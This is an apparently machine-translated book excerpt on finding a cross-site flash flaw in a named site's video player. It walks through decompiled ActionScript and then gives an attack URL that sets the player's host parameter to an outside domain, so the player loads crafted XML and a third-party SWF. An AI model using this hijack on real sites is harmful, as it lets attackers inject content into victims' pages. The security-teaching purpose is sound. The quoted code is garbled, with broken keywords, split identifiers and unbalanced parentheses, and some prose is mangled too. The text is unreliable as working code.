Xsf mining ideas

Xsf is Cross Site flash.

Flash players on many websites may have xsf risks, because these players need to be able to flexibly load third-party flash resources for playback. However, this xsf risk is actually very small, because when the browser directly accesses Flash files, the Security Sandbox restrictions are very strict. Therefore, the nxtv Flash Player analyzed below only requires an understanding of the concept. Such xsf vulnerabilities are of no value in such scenarios, and valuable is the idea.

Vulnerability files: http://video.nxtv.cn/flashapp/player.swf

The analysis methods include static analysis and dynamic analysis.

1. Static Analysis

We can use the swfscan graphical interface or the swfdump command line tool for decompilation to obtain the ActionScript code. Both tools are good. The following describes swfscan as an example.

6-5 shows the swfscan interface. In the Properties column, we can see that this is a flash written in as2. As2 has the risk of global variable coverage. The biggest value of swfscan for us is the source code of the source column. Other functions are generally not used and the source code is scanned by the naked eye, the following code is found in the decompiled source code.

 

Figure 6-5 swfscan page

VaR myxml = New XML ();

VaR _ callresult_162 = myxml. Load ("http: //" + _ root. HOST) + "/load. php? Action = playerad "));

Myxml. ignorewhite = true;

Myxml. onload = function (SUCCESS ){

Type = myxml. childnodes.0.childnodes. 0. childnodes.0.nodevalue;

Adurl = myxml. childnodes.0.childnodes. 1. childnodes.0.nodevalue;

_ Global. sec = Number (myxml. childnodes.0.childnodes. 2. childnodes.0.nodevalue );

STD = myxml. childnodes.0.childnodes. 3. childnodes.0.nodevalue;

If (STD = 1 )){

If (type = 1 )){

Mp1.contentpath = ("http: //" + _ root. HOST) + "/") + adurl );

VaR _ callresult_267 = mp1.play ();

First, load the remote XML file. This function is often used as because it is very convenient, easy to use, and highly configurable XML. Many of the subsequent functions will use the relevant data in the XML file. If the XML file can be hijacked, many subsequent operations can be hijacked.

Loading remote XML files can be hijacked: _ root. Host. Such global variables can be directly submitted through URL, for example:

Http://video.nxtv.cn/flashapp/player.swf? Host = evilcos. Me

The remote XML file is:

Http://evilcos.me/load.php? Action = playerad

Content 6-6 is shown.

 

Figure 6-6 remote XML content

This XML structure is consistent with the original one, but we replace the content with our own maliciously constructed, and then the contentpath value of mp1.play (); ("http: // "+ _ root. host) + "/") + adurl); changed:

Http://evilcos.me/flash/video.swf

In this way, a third-party flash is loaded for playback, resulting in xsf attacks.

In fact, it is not easy to analyze with the naked eye completely statically. In many cases, we will analyze it in a dynamic way. For example, some additional requests are found in firebug network requests in Firefox, A clearer understanding of the smooth running of the target flash.

2. Dynamic Analysis

Firebug network data is shown in 6-7.

 

Figure 6-7 firebug Network Data

Note: When loading third-party resources, you must have a crossdomain. xml file under the root directory of the third-party domain and authorize such cross-origin requests. By the way, if a third-party FLASH file is directly loaded, crossdomain. xml authorization is not required.

 

This article is excerpted from "Web Front-end hacker technology secrets"

Zhong Chenming, edited by Xu shaopei

Published by Electronic Industry Publishing House